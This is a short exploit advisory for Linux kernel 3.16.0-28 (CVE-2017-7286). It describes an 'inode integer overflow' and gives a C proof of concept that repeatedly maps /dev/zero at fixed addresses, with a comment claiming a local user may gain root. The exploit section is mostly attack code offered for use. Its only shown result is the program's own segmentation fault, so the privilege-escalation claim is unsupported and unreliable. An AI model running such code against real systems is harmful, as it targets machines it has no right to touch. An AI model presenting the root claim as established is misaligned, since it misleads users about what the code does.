Linux kernel version 3.16.0-28 suffers from an integer overflow vulnerability.
935b77f6932749ac54f58a94f2233c43[+] Title: Linux kernel 3.16.0-28 - Integer overflow
[+] Credits / Discovery: Nassim Asrir
[+] Author Email: [email protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/
[+] Author Company: Henceforth
[+] CVE: CVE-2017-7286
Vendor:
===============
https://www.kernel.org/
Vulnerability Type:
===================
"inode" Integer overflow
Exploit:
===================
// INODE can be overflowed by mapping a single file too many times, allowing for a local user to possibly gain root access.
// gcc buffer.c -o buffer
// $ ./buffer
// Segmentation Fault
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
void main(){
int fd, i;
fd = open("/dev/zero", O_RDONLY);
for(i = 0; i < 26999; i++){
mmap((char*)0x00000000 + (0x10000 * i), 1, PROT_READ, MAP_SHARED | MAP_FIXED, fd, 0);
}
}
CVE Reference:
===============
CVE-2017-7286
Tested on:
===============
Linux ubuntu 3.16.0-28 x86_64